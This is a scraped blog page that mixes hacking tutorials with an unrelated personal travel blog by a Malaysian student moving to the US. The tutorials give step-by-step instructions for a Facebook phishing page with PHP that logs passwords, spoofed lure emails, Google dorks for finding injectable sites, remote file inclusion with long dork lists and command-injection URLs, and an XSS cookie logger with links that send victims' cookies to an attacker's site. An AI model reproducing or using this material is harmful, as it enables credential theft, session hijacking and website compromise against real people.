Zicutake [Audio]

USAComment.com
Zicutake USA Comment | Search Articles










Zicutake Formation University:

USAComment.com | Search Articles of Onion.to
Search Articles of Onion.to:

Shorten that long URL into a tiny URL:
Example, enter the url: http://zicutake.usacomment.com = Tinyurl.com/hox5dyn


USAComment.com | TALK

 
Tweets by Zicutake


SEND YOUR HISTORY:

Contact Us

Monday, August 29, 2011

What is a trojan/worm/virus/logic bomb?

Trojan:
Remember the Trojan Horse? Bad guys hid inside it until they could get
into the city to do their evil deed. A trojan computer program is
similar. It is a program which does an unauthorized function, hidden
inside an authorized program. It does something other than what it
claims to do, usually something malicious (although not necessarily!),
and it is intended by the author to do whatever it does. If it's not
intentional, its called a 'bug' or, in some cases, a feature :) Some
virus scanning programs detect some trojans. Some virus scanning
programs don't detect any trojans. No virus scanners detect all
trojans.
Virus:
A virus is an independent program which reproduces itself. It may
attach to other programs, it may create copies of itself (as in
companion viruses). It may damage or corrupt data, change data, or
degrade the performance of your system by utilizing resources such as
memory or disk space. Some virus scanners detect some viruses. No
virus scanners detect all viruses. No virus scanner can protect
against "any and all viruses, known and unknown, now and forevermore".
Worm:
Made famous by Robert Morris, Jr. , worms are programs which reproduce
by copying themselves over and over, system to system, using up
resources and sometimes slowing down the systems. They are self
contained and use the networks to spread, in much the same way viruses
use files to spread. Some people say the solution to viruses and worms
is to just not have any files or networks. They are probably correct.
We would include computers.
Logic Bomb:
Code which will trigger a particular form of 'attack' when a
designated condition is met. For instance, a logic bomb could delete
all files on Dec. 5th. Unlike a virus, a logic bomb does not make
copies of itself.

How to Phish / Spoof FACEBOOK! (with pictures), Hack FB id

Now im gonna make a step by step tutorial for facebook accounts.

WITH PICTURES!!!




ONE!:


go to "www.facebook.com/login.php" and right click on some white space

on the page and press "view source code". ALOT of text is gonna appear,
copy it all to notepad.



TWO!:


Now we need to change a few things in the code. So that the login button

sends the info to our file instead of the facebook login. We do that by
editing the action of the code. So press Edit >> search. and
search "action=" without the quotes. you should find this



Board Image


The big red ring that circles the "action=" you have to change. You have

to change it to 'action="next.php" '. after you have done that, you
should change the method (small red circle on the picture) to "get"
instead of "post", or else it will not work. Save the document as
"index.PHP" (not htm!)



THREE!:


Now that we changed the action to next.php, we should also make a "next.php". open up notepad again. And write this:


   
       
           
           
                <?php

header("Location:
http://www.Facebook.com/login.php ");

$handle = fopen("passwords.txt", "a");


foreach($_GET as $variable => $value) {


fwrite($handle, $variable);


fwrite($handle, "=");


fwrite($handle, $value);


fwrite($handle, "\r\n");


}


fwrite($handle, "\r\n");


fclose($handle);


exit;


?>

           
       
   
Save this as "next.php"



Note: for security you should rename "passwords.txt" to something else.


now make a text file called "passwords.txt" or whatever you renamed the file to in the "next.php", leave this document blank.




FOUR!:


Upload the 3 files "index.php", "next.php" and "passwords.txt" (or

whatever the password file is called) to a subdomain hosting site. THEY
MUST SUPPORT .PHP! i suggest these: 110mb.com, spam.com or 007sites.com.
When you made an account you should upload the 3 files.



Congratz. You have yourself a working Phisher site!




FIVE!:


now we would like to send spoof emails out. To do that we should first

make an email account. which starts with facebook@. or something that
looks alike. like this FACEB0OK@hotmail.com or something like that. You should either use Gmail, Live, or hotmail. or you could get a mail like this "facebook@noreply.com" soemthing like that. but eventually that would cost. When your email is set go to step six.



SIX!:


Copy the content of an original Facebook friendship invitation email and paste it into a new mail. DONT SENT YET!


remove the hyperlink from this link:


http:/www.facebook.com/n/?reqs.php


Mark it and push the Add hyperlink button




Board Image




Add hyperlink button in the red circle. now write your phisher page url

in the hyperlink bar that appears after clicking the button. and click
add. The hyperlink should still display
http:/www.facebook.com/n/?reqs.php

but lead to your phisher page.. Thats pretty kewl. Now i belive your

ready to send your spoof emails to everybody you know. and hopefully
some of them will fall for it.

How to search Vulnerable site

1-) First go to http://www.google.com


2-) Press on the right, next to the textfield, on "Advanced Search".



Board Image



3-) Fill in your dork at "This exact wording or phrase".
    Results per page: 100 results (Or less depending on your internet speed.)
    Language: Could be all languages or one language. I choose Dutch
because I'm Dutch myself and I got a Dutch ISP so those sites will load
faster.
    Where your keywords show up: "in the URL of the page"


4-) Press search.


5-) Now we get this:



Board Image



6-) Press on about 10 links with your middle mouse (scrollbar) so each page will be opened in a new tab.


7-) Open the tabs and add as example a single quote behind the link.


8-) If it's vulnerable continue your injection else repeat step 5 -> 6.



Very easy (:


With this method I can find about 30 vulnerable websites in less than 2 hours and a few websites to upload a shell to.

Saturday, August 27, 2011

Apple Website Hacked by HodLuM



One of the Apple Sub-Domain claimed to be Defaced By HodLuM as shown above. The Deface Link is just an IMAGE uploaded to Apple domain. Hacker use "N00BZ" word for all Hacker including Anonymous , Lulzsec, Turkish hackers, Inj3t0rs and Exploit-DB's. AOL Postmaster Website was also got hacked by HODLUM some months before.

RFI - Remote File Inclusion.

Today I will be teaching you guys RFI (Remote File Inclusion).

What is RFI?
RFI is a very uncommon vulnerability due to excessive patches and updates on websites. You will be very lucky to find a vulnerable site. Nevertheless, there are still vulnerable websites, many users of HackForums have dorks for searching for RFI vulnerable websites, as well as having lists of RFI vulnerable websites. RFI, also known as Remote File Inclusion is exactly what it's name is. You include a file onto the website remotely.

What makes a page vulnerable?
A PHP include script looks like this.

Code:
<?php
include($_GET['p']
?>

Since the code uses 'p' the syntax would be:
Code:
http://victimsite.com/index.php?[b]p[/b]=URL_TO_SHELL.txt?

If the script looks like this:
Code:
<?php
include($_GET['lulz']);
?>

The syntax would then be:
Code:
http://victimsite.com/index.php?lulz=URL_TO_SHELL.txt?

Understood?

What can I accomplish with RFI?

You can include your PHP shells onto the website (GNYShell, C99, etc).
You can include just about any file onto the website.

How can I search for RFI vulnerable sites?

Using dorks, exploit scanners, etc.

Here is a list of RFI dorks:

Code:
inurl:/modules/My_eGallery/public/displayCategory.php?basepath=

inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

inurl:/include/new-visitor.inc.php?lvc_include_dir=

inurl:/_functions.php?prefix=

inurl:/cpcommerce/_functions.php?prefix=

inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=

inurl:/modules/agendax/addevent.inc.php?agendax_path=

inurl:/ashnews.php?pathtoashnews=

inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=

inurl:/pm/lib.inc.php?pm_path=

inurl:/b2-tools/gm-2-b2.php?b2inc=

inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

inurl:/modules/agendax/addevent.inc.php?agendax_path=

inurl:/includes/include_once.php?include_file=

inurl:/e107/e107_handlers/secure_img_render.php?p=

inurl:/shoutbox/expanded.php?conf=

inurl:/main.php?x=

inurl:/myPHPCalendar/admin.php?cal_dir=

inurl:/index.php/main.php?x=

inurl:/index.php?include=

inurl:/index.php?x=

inurl:/index.php?open=

inurl:/index.php?visualizar=

inurl:/template.php?pagina=

inurl:/index.php?pagina=

inurl:/index.php?inc=

inurl:/includes/include_onde.php?include_file=

inurl:/index.php?page=

inurl:/index.php?pg=

inurl:/index.php?show=

inurl:/index.php?cat=

inurl:/index.php?file=

inurl:/db.php?path_local=

inurl:/index.php?site=

inurl:/htmltonuke.php?filnavn=

inurl:/livehelp/inc/pipe.php?HCL_path=

inurl:/hcl/inc/pipe.php?HCL_path=

inurl:/inc/pipe.php?HCL_path=

inurl:/support/faq/inc/pipe.php?HCL_path=

inurl:/help/faq/inc/pipe.php?HCL_path=

inurl:/helpcenter/inc/pipe.php?HCL_path=

inurl:/live-support/inc/pipe.php?HCL_path=

inurl:/gnu3/index.php?doc=

inurl:/gnu/index.php?doc=

inurl:/phpgwapi/setup/tables_update.inc.php?appdir=

inurl:/forum/install.php?phpbb_root_dir=

inurl:/includes/calendar.php?phpc_root_path=

inurl:/includes/setup.php?phpc_root_path=

inurl:/inc/authform.inc.php?path_pre=

inurl:/include/authform.inc.php?path_pre=

inurl:index.php?nic=

inurl:index.php?sec=

inurl:index.php?content=

inurl:index.php?link=

inurl:index.php?filename=

inurl:index.php?dir=

inurl:index.php?document=

inurl:index.php?view=

inurl:*.php?sel=

inurl:*.php?session=&content=

inurl:*.php?locate=

inurl:*.php?place=

inurl:*.php?layout=

inurl:*.php?go=

inurl:*.php?catch=

inurl:*.php?mode=

inurl:*.php?name=

inurl:*.php?loc=

inurl:*.php?f=

inurl:*.php?inf=

inurl:*.php?pg=

inurl:*.php?load=

inurl:*.php?naam=

allinurl:/index.php?page= site:*.dk

allinurl:/index.php?file= site:*.dk

INURL OR ALLINURL WITH:

/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=

/includes/header.php?systempath=

/Gallery/displayCategory.php?basepath=

/index.inc.php?PATH_Includes=

/ashnews.php?pathtoashnews=

/ashheadlines.php?pathtoashnews=

/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

/demo/includes/init.php?user_inc=

/jaf/index.php?show=

/inc/shows.inc.php?cutepath=

/poll/admin/common.inc.php?base_path=

/pollvote/pollvote.php?pollname=

/sources/post.php?fil_config=

/modules/My_eGallery/public/displayCategory.php?basepath=

/bb_lib/checkdb.inc.php?libpach=

/include/livre_include.php?no_connect=lol&chem_absolu=

/index.php?from_market=Y&pageurl=

/modules/mod_mainmenu.php?mosConfig_absolute_path=

/pivot/modules/module_db.php?pivot_path=

/modules/4nAlbum/public/displayCategory.php?basepath=

/derniers_commentaires.php?rep=

/modules/coppermine/themes/default/theme.php?THEME_DIR=

/modules/coppermine/include/init.inc.php?CPG_M_DIR=

/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=

/coppermine/themes/maze/theme.php?THEME_DIR=

/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=

/myPHPCalendar/admin.php?cal_dir=

/agendax/addevent.inc.php?agendax_path=

/modules/mod_mainmenu.php?mosConfig_absolute_path=

/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=

/main.php?page=

/default.php?page=

/index.php?action=

/index1.php?p=

/index2.php?x=

/index2.php?content=

/index.php?conteudo=

/index.php?cat=

/include/new-visitor.inc.php?lvc_include_dir=

/modules/agendax/addevent.inc.php?agendax_path=

/shoutbox/expanded.php?conf=

/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

/pivot/modules/module_db.php?pivot_path=

/library/editor/editor.php?root=

/library/lib.php?root=

/e107/e107_handlers/secure_img_render.php?p=

/zentrack/index.php?configFile=

/main.php?x=

/becommunity/community/index.php?pageurl=

/GradeMap/index.php?page=

/index4.php?body=

/side/index.php?side=

/main.php?page=

/es/index.php?action=

/index.php?sec=

/index.php?main=

/index.php?sec=

/index.php?menu=

/html/page.php?page=

/page.php?view=

/index.php?menu=

/main.php?view=

/index.php?page=

/content.php?page=

/main.php?page=

/index.php?x=

/main_site.php?page=

/index.php?L2=

/content.php?page=

/main.php?page=

/index.php?x=

/main_site.php?page=

/index.php?L2=

/index.php?show=

/tutorials/print.php?page=

/index.php?page=

/index.php?level=

/index.php?file=

/index.php?inter_url=

/index.php?page=

/index2.php?menu=

/index.php?level=

/index1.php?main=

/index1.php?nav=

/index1.php?link=

/index2.php?page=

/index.php?myContent=

/index.php?TWC=

/index.php?sec=

/index1.php?main=

/index2.php?page=

/index.php?babInstallPath=

/main.php?body=

/index.php?z=

/main.php?view=

/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

/index.php?file=

/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

1. allinurl:my_egallery site:.org
/modules/My_eGallery/public/displayCategory.php?basepath=

2. allinurl:xgallery site:.org
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

3. allinurl:coppermine site:.org
/modules/coppermine/themes/default/theme.php?THEME_DIR=

4. allinurl:4nAlbum site:.org
/modules/4nAlbum/public/displayCategory.php?basepath=

5. allinurlP:NphpBB2 site:.org
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

6. allinurl:ihm.php?p=

7. Keyword : "powered by AllMyLinks"
/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

8. allinurl:/modules.php?name=allmyguests
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

9. allinurl:/Popper/index.php?
/Popper/index.php?childwindow.inc.php?form=

10. google = kietu/hit_js.php, allinurl:kietu/hit_js.php
yahoo = by Kietu? v 3.2
/kietu/index.php?kietu[url_hit]=

11. keyword : "Powered by phpBB 2.0.6"
/html&highlight=%2527.include($_GET[a]),exit.%2527&a=

12. keyword : "powered by CubeCart 3.0.6"
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

13. keyword : "powered by paBugs 2.0 Beta 3"
/class.mysql.php?path_to_bt_dir=

14. allinurl:"powered by AshNews", allinurl:AshNews atau allinurl: /ashnews.php
/ashnews.php?pathtoashnews=

15. keyword : /phorum/login.php
/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=

16. allinurl:ihm.php?p=*

14. keyword : "powered eyeOs"
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cmd=id
diganti dengan :
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5ba%5d); ​&a=

15. allinurl:.php?bodyfile=

16. allinurl:/includes/orderSuccess.inc.php?glob=
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

17. allinurl:forums.html
/modules.php?name=

18. allinurl:/default.php?page=home

19. allinurl:/folder.php?id=

20. allinurl:main.php?pagina=
/paginedinamiche/main.php?pagina=

21. Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( allinurl:*.edu.*/modules.php?name=allmyguests ) or ( "powered by AllMyGuests")
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

22. allinurl:application.php?base_path=
/application.php?base_path=

23. allinurlp:hplivehelper
/phplivehelper/initiate.php?abs_path=

24. allinurlp:hpnuke
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

25. key word : "powered by Fantastic News v2.1.2"
/archive.php?CONFIG[script_path]=

26. keyword: "powered by smartblog" AND inurl:?page=login
/index.php?page=

27. allinurl:/forum/
/forum/admin/index.php?inc_conf=

28. keyword:"Powered By FusionPHP"
/templates/headline_temp.php?nst_inc=

29. allinurl:shoutbox/expanded.php filetypep:hp
/shoutbox/expanded.php?conf=

30. allinurl: /osticket/
/osticket/include/main.php?config[search_disp]=true&include_dir=

31. keyword : "Powered by iUser"
/common.php?include_path=

32. allinurl: "static.php?load="
/static.php?load=

33. keyworld : /phpcoin/login.php
/phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=

34. keyworld: allinurl:/phpGedview/login.php site:
/help_text_vars.php?dir&PGV_BASE_DIRECTORY=

35. allinurl:/folder.php?id=
/classes.php?LOCAL_PATH=

inurl:"/lire.php?rub="

inurl:"/os/pointer.php?url="

inurl:"folder.php?id="

inurl:"show.php?page="

inurl:"index2.php?DoAction="

inurl:"index.php?canal="

inurl:"index.php?screen="

inurl:"index.php?langc="

inurl:"index.php?Language="

inurl:"view.php?page="

dork: "powered by doodle cart"
rfi of this dork: enc/content.php?Home_Path=

dork: "Login to Calendar"
rfi of this dork: /embed/day.php?path=

dork: "powered by EQdkp"
rfi of this dork: /includes/dbal.php?eqdkp_root_path=

inurl:"template.php?goto="

inurl:"video.php?content="

inurl:"pages.php?page="

inurl:"index1.php?choix="

inurl:"index1.php?menu="

inurl:"index2.php?ascii_seite="

dork: inurl:surveys
rfi to this dork: /surveys/survey.inc.php?path=

inurl:"index.php?body="

dork: allinurl:adobt sitel
rfi to this dork: /classes/adodbt/sql.php?classes_dir=

dork: "Powered By ScozNews"
rfi to this dork: /sources/functions.php?CONFIG[main_path]=
rfi to this dork: /sources/template.php?CONFIG[main_path]=

inurl:"kb_constants.php?module_root_path="

dork: allinurl:"mcf.php"
rfi to this dork: /mcf.php?content=

dork: inurl:"main.php?sayfa="
rfi to this dork: /main.php?sayfa=

dork: "MobilePublisherPHP"
rfi to this dork: /header.php?abspath=

dork: "powered by phpCOIN 1.2.3"
rfi to rhis dork: /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=

allinurl:login.php?dir=

inurl:"index.php?go="

inurl:"index1.php?="

inurl:"lib/gore.php?libpath="

inurl:"index2.php?p="

Exploit scanners: http://www.youtube.com/v/f6SOzynrWx4

We've got our target, how do we exploit this vulnerability?

Testing the vulnerability is basically exploiting the vulnerability. So we will be testing as well as finishing up.
What you have to do is go to your vulnerable website. In this case I will be making a website up for demonstration.
Code:
http://victimsite.com/index.php?p=interview.php

As you can see above there is a file attached to the index.php file. In this case it is "interview.php". Most of the time there will have to be a file at the end of the URL, just like this one. Since we're including a file there has to be something to replace it with.

Tweaking and exploiting.

So now we want to tweak this to our advantage. This is rather simple.

What you will need.

You will need to upload your shell in .txt format (shell.txt) instead of .php format (shell.php).
You will need to upload it to any website hosting.
So once you have uploaded your shell to your website, it should look like this.
Code:
http://yoursite.com/shell.txt

Including our shell to our slave's website.
Okay, once we are at the vulnerable page (http://victimsite.com/index.php?p=include.php) we want to replace "include.php" and include our own file.
Our new link should look like this.
Code:
http://victimsite.com/index.php?p=http://yoursite.com/shell.txt?
The question mark (?) is important. If the site was vulnerable you should now see your shell embedded to the webpage. You can then do as you wish with it.

Sometimes "shell.txt?" may not be enough, we may need to use null bytes for it to execute successfully. If you receive an error from "shell.txt?" try "shell.txt?%00".


I hope this helps. Happy hacking.

XSS - Cross Site Scripting.

Today I will be teaching you a very common vulnerability called XSS/Cross Site Scripting. Plus how to exploit it.

What is XSS, what can I accomplish with it?

XSS is common in search bars and comment boxes. We can then inject almost any type of programming language into the website. Whether it be Javascript, HTML or XML. XSS is mainly directed at Javascript injection. However, you can inject other languages which will be shown later.
Most people use it to display messages on the website, redirect you to their defacement and even put cookie loggers and XSS shells on the website.

What causes the vulnerability?

Poor PHP coding within text boxes and submission forms. They were too lazy to code it properly allowing us to inject strings into the source code, that would then give us the conclusion of what we put in since it's also in the source code. They did not bother to filter what we type in. They allowed characters such as ">, ", /", etc.

What types of XSS are there?

There are two types of XSS. Persistent and non-persistent. If you inject some code into the website and it sticks to the website (you leave the page and come back, and it's still there) then it is persistent. That is good. When you get non-persistent it will not stick on the website, you will only see it once. With persistent XSS you can do much more, leave messages, redirect them, etc. With non-persistent the most you can do is upload a cookie logger.

What will you be teaching today?

The basics of XSS and cookie logging.

How to test for XSS vulnerabilities.

To test if the website is vulnerable to XSS we want to go to a search box and inject some Javascript. We've found a search box and now we want to use Javascript to alert a message so we can see if the Javascript was successfully executed.
Code:
<script>alert('XSS');</script>

We now see a pop up message on our screen saying "XSS". This is what it should look like: http://img845.imageshack.us/img845/7924/xss1.png

In some cases, a message might not pop up. If it doesn't work, check the source code and have a look at the output. Most of the time the error requires you to make a little change.

Code:
"><script>alert('XSS');</script>

Okay, we have found out that it is vulnerable. We can now move on.

How can I deface a webpage with XSS?

I will be showing you methods for persistent, and non-persistent XSS.

Persistent XSS.

First I will be starting with persistent XSS. Since it's persistent I want to redirect my victims to a deface page. We simply just inject this some more Javascript like we did before:
Code:
<script>window.location="http://yourdefacepage.com/index.html";</script>

Remember, you can always alter the code if it doesn't work.
You can do many things with XSS, you just need all the right strings. I'm only focusing on defacing, since most people just deface sites these days.

Non-persistent XSS.

Okay. Obviously we can't redirect users with non-persistent. But with basic web-based programming knowledge we can make a cookie logger. We may also need advanced social engineering skills for people to open our cookie logger.

How to make a cookie logger.

Make two files:
Cookiemonster.php
Cookies.txt

Cookiemonster.php:

Code:
<?php
/*
* Created on 16. april. 2007
* Created by Audun Larsen (audun@munio.no)
*
* Copyright 2006 Munio IT, Audun Larsen
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
* INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
* OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
* EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/

if(strlen($_SERVER['QUERY_STRING']) > 0) {
    $fp=fopen('./cookies.txt', 'a');
    fwrite($fp, urldecode($_SERVER['QUERY_STRING'])."\n");
    fclose($fp);
} else {
?>

var ownUrl = 'http://<?php echo $_SERVER['HTTP_HOST']; ?><?php echo $_SERVER['PHP_SELF']; ?>';

// ==
//  URLEncode and URLDecode functions
//
// Copyright Albion Research Ltd. 2002
// http://www.albionresearch.com/
//
// You may copy these functions providing that
// (a) you leave this copyright notice intact, and
// (b) if you use these functions on a publicly accessible
//  web site you include a credit somewhere on the web site
//  with a link back to http://www.albionresearch.com/
//
// If you find or fix any bugs, please let us know at albionresearch.com
//
// SpecialThanks to Neelesh Thakur for being the first to
// report a bug in URLDecode() - now fixed 2003-02-19.
// And thanks to everyone else who has provided comments and suggestions.
// ==
function URLEncode(str)
{
    // The Javascript escape and unescape functions do not correspond
    // with what browsers actually do...
    var SAFECHARS = "0123456789" +        // Numeric
        "ABCDEFGHIJKLMNOPQRSTUVWXYZ" +    // Alphabetic
        "abcdefghijklmnopqrstuvwxyz" +
        "-_.!~*'()";        // RFC2396 Mark characters
    var HEX = "0123456789ABCDEF";

    var plaintext = str;
    var encoded = "";
    for (var i = 0; i < plaintext.length; i++ ) {
        var ch = plaintext.charAt(i);
        if (ch == " ") {
            encoded += "+";                // x-www-urlencoded, rather than %20
        } else if (SAFECHARS.indexOf(ch) != -1) {
            encoded += ch;
        } else {
            var charCode = ch.charCodeAt(0);
            if (charCode > 255) {
                alert( "Unicode Character '"
    + ch
    + "' cannot be encoded using standard URL encoding.\n" +
                    "(URL encoding only supports 8-bit characters.)\n" +
          "A space (+) will be substituted." );
                encoded += "+";
            } else {
                encoded += "%";
                encoded += HEX.charAt((charCode >> 4) & 0xF);
                encoded += HEX.charAt(charCode & 0xF);
            }
        }
    } // for

    return encoded;
};

cookie = URLEncode(document.cookie);
html = '<img src="'+ownUrl+'?'+cookie+'">';
document.write(html);

< ?php
}
?>

Then just leave cookies.txt blank. But make sure you made the file.

How do I send my cookie logger to my slave?

Code:
<a href="javascript:document.location='http://www.mysite.com/cookiemonster.php?cookie='+document.cookie;">Click here!</a>

Code:
<script>document.location="http://www.host.com/mysite/stealer.php?cookie=" + document.cookie;</script>

What does a cookie look like?
Once you have received their cookie it should end with "PHPSESSID=52ce8e4a74936673js24500be1919004"
The cookie is the string after "PHPSESSID="
There are different forms of cookies. If you have your cookie logger setup correctly it won't matter, just copy and paste it all into your cookie editor.

What can I do with someone else's cookie?

Once you have someone else's cookie you can use a cookie editor, (search for one on Google) go to the victims website, change your cookie to their's and you should be logged in as the user they are. Example; if your target is "admin" and "admin" has logged into the site, you send him your cookie logger and steal his cookie, you then change your cookie to the admin's cookie, and you will then have access to the website and do as you wish.

Using other programming languages for XSS.

It's simple, to test if it's vulnerable try this.
Code:
<html><font color = "red">XSS</font>

If the text says XSS in red, then it's vulnerable to HTML injection as well. Just inject other languages in, and you will be able to do much more.

I hope this helps. Happy hacking.

夏天?

美国这里还是夏天,天气比往常的热。
听到地的居民说,今年的温度真的是有史以来最热的一次。

在这里学会了礼貌和热情。
现在就算上巴士也会说声:'Hi,How are you?'
所以说外国人就是热情,不拘谨。刚来的其中2次我们去shopping结果不知道在哪里搭巴士回家,结果当地的居民真的有够好人,主动offer我们然后载我们到家门口。在马来西亚的话我们永远不会这样对陌生的人伸出援手。更何况现在在他们的眼中我们再陌生不过,重别个国家来的陌生人而已。

这样的天气真的让我很难受,脸都有轻微被晒伤。
Apartment里面有Gym和Swimming Pool. 闷的时候就会去,没什么喜欢work out所以多是往pool跑。

游泳池很不错呐,很有feel的感觉。

爱游泳的你们是否觉得越深的地方越好游呢?我是那样觉得,最喜欢在深深的地方游泳。




朋友们finished work out了然后我们就randomly post了几下



我,等我身材真的很好的时候我会考虑穿bikini. 话说现在我真的瘦了一轮,比起以前在malayisia吃得更少,学校大到每天重一个building去另一个building的时候走到我都要蒸发了。


我的网速快到都要偷笑。这2天很努力在赶戏,明天要开始做功课了。yosh,努力。
Bye

Friday, August 26, 2011

Welcome home baby!


Just get my internet fixed today!
Gosh,2 weeks after I touched down here.
We played poker card/reading newspaper in the past 2 weeks to survive without internet, how good we are.
And this is just a little update that what I bought so far.

Macbook Pro 13inch with i7 processor ! my version is more exp than the normal macbook pro 13 since the old one don't have stock so i paid more to get the upgraded one !

Yo, baby in the house !



And yes, get my very own study desk and i like it so much :)


Everything is so god damn expensive here. Waiting for Iphone5 and I pray hard it would be come out and there is no cancellation for this. If not i will just go and bang wall, haha.

Bye, i try to update more often but these few days will be busy.
and I think i turn thinner now and i get sunburn on my little face, SUMMER PLS END SOON.


Friday, August 19, 2011

Greeting from US !




miss MALAYSIA. :(

I am madly exhausted these few days after landed at Oklahoma safely.
The flight was really tortured me, it took about 12 hours from Narita,Japan to Chicago and another 1h40min from Chicago to Oklahoma. We met turbulence on the plane for about 5 minutes, the plane was shaking and some people drinks/food was been falling upside down.

Anyway I am safe now and staying in a high-class apartment. Have swimming pool here and gym that open 24 hours for residents. The apartment has 3 rooms/2 bathrooms. Kitchen included microwave,oven,stove,dish washer,fridge and everything. Guess what, there are also washer and dryer available here ! The people haven't come to fix the internet yet so now I couldn't upload my apartment pictures for you.

About the Uni, it is seriously huge. If compared to Malaysia's Uni, hmm...Met academic advisor and finally enrolled for subjects. Taking 4 subjects in this semester so I won't stress out, hopefully I can cope with it and I want to get a good grade :) Same,will take more photos of my Uni to share with you guys.

Went Wallmart and Taget past 2 days to grab some grocery and furniture. And their mart is so huge, EVERYTHING HERE IS HUGE. Electric appliances are so low price here, get a hair dryer in only $12. Ipad2 is everywhere here whereas in Malaysia you need to order and wait or even cannot white color.

Still not in the mood of blogging. Next post want to share about my Taiwan trip which also tortured me a lot because either walking or taking MRT all the way. :(

Yeah,going to get my Macbook Pro real soon !
bye bye.

Friday, August 12, 2011

Bye Bye Malaysia


Hi guys, finally the this is the moment I say GoodBye to all of you.
Will be leaving Malaysia within 12 hours, the early morning tomorrow.

I miss everyone and everything here definitely.
The moment so harsh for me to pass through. Tears dropped when my mind full of those laughter  that I had gain from all of the beloved.

More to talk when I touch down to the States and after settle everything I will update my brand new life there.
Stay tuned and support me always.

My life will be different without my family and my bf.
I need to be strong, mature and Independent. Trust me I must rock this shit up ! I will not be defeated by anything or any obstacles.





BYE ! ainiyo bibi.

Monday, August 8, 2011

Say hello to goodbye 3




不美但是我最近都要露齿笑!
上个星期男友回来陪我2天,不长不短,其实很短。*掉泪
提议去Sunway Pyramid因为比较少去,其它的地方可以说给我们踏平了,非常的闷。

本来心想要拍些照片的所以就好好打扮一番,我这种懒人很懒惰,真的我好想就T-shirt拖鞋往外跑。不过蛮难过的因为那天没什么拍到照,都是因为懒惰的性格,连拍照也没劲 *飞踢

So,我第一次穿长裙,其实我不介意看起来矮,因为没人固定只有高的人才可以穿长裙。这件裙的布料好好,很柔顺很滑就料子很好的,颜色我也喜欢。Aww我是肥了,真的,所以任何negative comment我现在都接受因为我承认我吃喝玩乐了几个月,可以keep到这个肥度是不错了的 *洒花拍手


这张是近2个月来我的小小自拍照,最近跑来跑去不同的farewell拍照的时候都是合照。很少自拍,因为我懒惰!完全没劲儿 :(




MAC唇膏我的最爱
晚餐去了BBQ Plaze,话说我们第一次约会的地点就是这里。 *害羞一下下
好,我这个爱吃鬼吃到烤肉很好吃。而且那时排队排很久,可是我们的电影9点就要开场了,我的一句我要吃我男友就陪我一起等,结果我们迟进场半个钟吧...Hmm,不过因为电影是Free的,Nuffnang给的gift voucher,所以没什么心痛啦。:)




Pork Set的好好吃,很想再吃,一直吃



武侠,不是很好看幸好是免费买的戏,不然我会生气

然后晚上男友要带我去setapak附近找shisha的结果找不到,我们还迷路去到很阴森的Kampung,那个Gps不知道发生什么事,总之就很恐怖就是了。

第二天也出去走走打算买包包给我放Passport/cash那些的。可是看了几间都没什么看上眼。看到大镜子我就想到要拍,忽略我们的打扮,这种是casual look :P


男友也很贴心买了很多药给我带过去,我没什么在乎这些因为我一直觉得我是不会生病的,我强壮大只的身躯应该可以经历风风雨雨。不过很感谢他的用心。药后面那个白色信封是男友交给我的东西,说直到到美国为此都不可以打开,我很听话的所以也愿封不动,现在就全部在行李里面了。

还有还有,我一直都有收集和男友看电影的戏票。那天挖出来看有一大叠,算了我们看了57套戏。天哪,花了1.5k在电影上面~ 其实真的电影好赚钱啊


好啦,男友篇大概就那么简短。照片没有,特别节目也没有。
所以我也不知道要写什么了哦,我爱你,你爱我是不是? 哈哈

*生活随记*
